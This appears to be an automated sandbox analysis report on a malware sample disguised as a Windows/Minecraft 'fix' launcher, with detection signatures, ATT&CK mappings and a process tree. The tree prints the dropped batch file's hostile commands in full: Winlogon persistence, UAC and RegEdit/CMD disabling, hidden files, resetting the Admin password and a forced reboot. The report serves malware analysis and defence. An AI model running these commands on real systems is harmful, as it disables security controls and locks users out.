cbfbec1a1000c8f26e8571ee40149181769b7b3e726a106ca0873395ff60b0f7

Resubmissions

28/03/2025, 20:09

250328-yxltlasmy3 10

28/03/2025, 19:54

250328-ym1vrszzhy 10

Analysis

max time kernel
100s
max time network
104s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
28/03/2025, 20:09

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

MfW10_Fix_Repair_UWP_V2_Generic/Launcher.exe
Size

347KB
MD5

0d99a45748e44931d02fb41e9109e75f
SHA1

bd0663ac151d9ae98775f09cfd8474ba6eaf0c4c
SHA256

af297a03aa02c3f3f77ab8c61d9e89f952c7ee41e646d6a93a0e2f050eb7c81f
SHA512

94b26a2347dce07002cb7a984c46005b7e5094f822f919c9045404181479a736bb86d9a04ac3277c4c98fe08e6466e412bd3232d4273f5371bc5e3456860eb1d
SSDEEP

6144:XUMx/y5qZuafofZMfwZj7CKIbohmTvI8+Z8xgBSl:EK8VfwwZjYboJ7Zno

Score

10^/10

defense_evasion discovery persistence ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1216697136-3907990103-1733992739-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
84	4648	firefox.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2544	attrib.exe
2584	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
5940	No Escape.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
10	raw.githubusercontent.com
84	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1216697136-3907990103-1733992739-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg"	reg.exe

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\erode.exe	No Escape.exe
File created	C:\Program Files (x86)\hello.bat	No Escape.exe
File created	C:\Program Files (x86)\hello.reg	No Escape.exe
File created	C:\Program Files (x86)\launch.exe	No Escape.exe
File created	C:\Program Files (x86)\msg.exe	No Escape.exe
File created	C:\Program Files (x86)\shaking.exe	No Escape.exe
File created	C:\Program Files (x86)\hello.jpg	No Escape.exe
File created	C:\Program Files (x86)\mover.exe	No Escape.exe
File created	C:\Program Files (x86)\mypc.exe	No Escape.exe
File created	C:\Program Files (x86)\date.txt	No Escape.exe
File created	C:\Program Files (x86)\	No Escape.exe
File opened for modification	C:\Program Files (x86)\	No Escape.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\No Escape.exe:Zone.Identifier	firefox.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	No Escape.exe

Checks processor information in registry 2 TTPs 22 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "4"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1216697136-3907990103-1733992739-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1704	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\No Escape.exe:Zone.Identifier	firefox.exe

Runs .reg file with regedit 1 IoCs

pid	Process
4616	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1140	Launcher.exe
1140	Launcher.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4648	firefox.exe
Token: SeDebugPrivilege	4648	firefox.exe
Token: SeShutdownPrivilege	4284	shutdown.exe
Token: SeRemoteShutdownPrivilege	4284	shutdown.exe

Suspicious use of FindShellTrayWindow 19 IoCs

pid	Process
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3192	OpenWith.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
4648	firefox.exe
5940	No Escape.exe
2344	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1140 wrote to memory of 1492	1140	Launcher.exe	79
PID 1140 wrote to memory of 1492	1140	Launcher.exe	79
PID 1140 wrote to memory of 5364	1140	Launcher.exe	81
PID 1140 wrote to memory of 5364	1140	Launcher.exe	81
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 1940 wrote to memory of 4648	1940	firefox.exe	85
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 2392	4648	firefox.exe	86
PID 4648 wrote to memory of 5056	4648	firefox.exe	87
PID 4648 wrote to memory of 5056	4648	firefox.exe	87
PID 4648 wrote to memory of 5056	4648	firefox.exe	87
PID 4648 wrote to memory of 5056	4648	firefox.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2544	attrib.exe
2584	attrib.exe

C:\Users\Admin\AppData\Local\Temp\MfW10_Fix_Repair_UWP_V2_Generic\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\MfW10_Fix_Repair_UWP_V2_Generic\Launcher.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start minecraft:
  2⤵
  - Modifies registry class
  PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause
  2⤵
  PID:5364

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3192

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Downloads MZ/PE file
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1856 -prefsLen 27097 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2060 -initialChannelId {0d859850-2094-4b44-8b82-a172a08b052c} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:2392
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2432 -prefsLen 27133 -prefMapHandle 2436 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {178eb492-6215-4f01-b57c-8d1fbeedce69} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    PID:5056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3808 -prefsLen 27323 -prefMapHandle 3812 -prefMapSize 270279 -jsInitHandle 3816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3824 -initialChannelId {1bfd0cd5-fbb2-4c8f-ab29-d99ffe16d876} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:2384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3996 -prefsLen 27323 -prefMapHandle 4000 -prefMapSize 270279 -ipcHandle 4084 -initialChannelId {b84a0333-137e-4d0e-9006-47d2df50fce4} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:3424
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3044 -prefsLen 34822 -prefMapHandle 2600 -prefMapSize 270279 -jsInitHandle 2764 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4736 -initialChannelId {a60d5882-ec48-4ec1-83e6-619cb5cdbe0a} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:2856
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5080 -prefsLen 35010 -prefMapHandle 5084 -prefMapSize 270279 -ipcHandle 5088 -initialChannelId {c88b604f-fe63-4b0d-853c-3b79bc6b28fd} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:2488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5652 -prefsLen 32952 -prefMapHandle 5656 -prefMapSize 270279 -jsInitHandle 5660 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3968 -initialChannelId {570751dd-ee91-4cc2-9fa6-920a4be6055d} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:4176
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5792 -prefsLen 32952 -prefMapHandle 5796 -prefMapSize 270279 -jsInitHandle 5800 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5804 -initialChannelId {8e9bff51-15ce-45b9-8a55-c8e56f359c49} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:2020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5976 -prefsLen 32952 -prefMapHandle 5980 -prefMapSize 270279 -jsInitHandle 5984 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5992 -initialChannelId {ed678b47-9607-4739-b619-ee0990df5783} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:4020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6524 -prefsLen 33071 -prefMapHandle 6528 -prefMapSize 270279 -jsInitHandle 6532 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6540 -initialChannelId {a70b900d-0859-4edf-bf8f-2c93c347691e} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
    3⤵
    - Checks processor information in registry
    PID:2876
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2736 -prefsLen 33071 -prefMapHandle 4680 -prefMapSize 270279 -jsInitHandle 4616 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4876 -initialChannelId {29d305fb-9f12-4cbe-8c22-7c5d9bb11d05} -parentPid 4648 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4648" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
    3⤵
    - Checks processor information in registry
    PID:128
- - C:\Users\Admin\Downloads\No Escape.exe
    "C:\Users\Admin\Downloads\No Escape.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5940
  - - C:\Windows\system32\wscript.exe
      "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\46B.tmp\46C.tmp\46D.vbs //Nologo
      4⤵
      PID:1420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "
        5⤵
        
        PID:5488
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h C:\msg.exe
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2544
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h C:\launch.exe
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2584
      - C:\Windows\regedit.exe
        
        regedit /s hello.reg
        6⤵
        Runs .reg file with regedit
        
        PID:4616
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
        6⤵
        
        PID:1108
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
        6⤵
        Modifies WinLogon for persistence
        
        PID:4004
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
        6⤵
        Sets desktop wallpaper using registry
        
        PID:1116
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
        6⤵
        
        PID:1796
      - C:\Windows\system32\reg.exe
        
        reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        
        PID:716
      - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
        6⤵
        
        PID:6140
      - C:\Windows\system32\reg.exe
        
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        6⤵
        Disables RegEdit via registry modification
        Modifies registry key
        
        PID:1704
      - C:\Windows\system32\net.exe
        
        net user Admin death
        6⤵
        
        PID:2256
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin death
        7⤵
        
        PID:3148
      - C:\Windows\system32\shutdown.exe
        
        shutdown /t 0 /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4284

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a3f055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\date.txt

Filesize
120B

MD5
255a8e245b6ad378558b90cbe3dbc3d0

SHA1
6eb73f9f2034c113a2a6b1aab9a440a21928cfc2

SHA256
d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9

SHA512
67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf

Download Submit
C:\Program Files (x86)\hello.bat

Filesize
1KB

MD5
b86fddd2b764f079615be5d4dc3e158d

SHA1
2510479054db1fe52cc2dcd3c7033d91204cb367

SHA256
2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091

SHA512
915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63

Download Submit
C:\Program Files (x86)\hello.jpg

Filesize
110KB

MD5
057ea45c364eb2994808a47b118556a2

SHA1
1d48c9c15ea5548af1475b5a369a4f7b8db42858

SHA256
6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836

SHA512
582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760

Download Submit
C:\Program Files (x86)\hello.reg

Filesize
3KB

MD5
81427e9d5d10657b9edffd22e7b405bb

SHA1
f27ab62f77f827dbb32c66a35ac48006c47f4374

SHA256
bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83

SHA512
b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592

Download Submit
C:\Program Files (x86)\launch.exe

Filesize
92KB

MD5
b4acc41d0e55b299ffeec11a8a20cf08

SHA1
bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa

SHA256
34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42

SHA512
d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794

Download Submit
C:\Program Files (x86)\msg.exe

Filesize
9KB

MD5
331a0667b11e02330357565427dc1175

SHA1
d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2

SHA256
fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431

SHA512
1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\parkins6.default-release\activity-stream.discovery_stream.json

Filesize
21KB

MD5
59df530c807c73a028d7825a37a6a4c1

SHA1
16e571ebf40097f231dca60cc5d243741c540115

SHA256
a0260f42c690fd5daf33d61c3d107364ef546d683b4db8de51a997900b9dcee4

SHA512
687c5a05dc3310039175e40ed8d37b3e8bf7192e085e6715228b552c8981f1308fd2712dff230fbf0aeb7601f95301cd54bf07460fb81b22f017ba7f2c5fb981

Download Submit
C:\Users\Admin\AppData\Local\Temp\46B.tmp\46C.tmp\46D.vbs

Filesize
588B

MD5
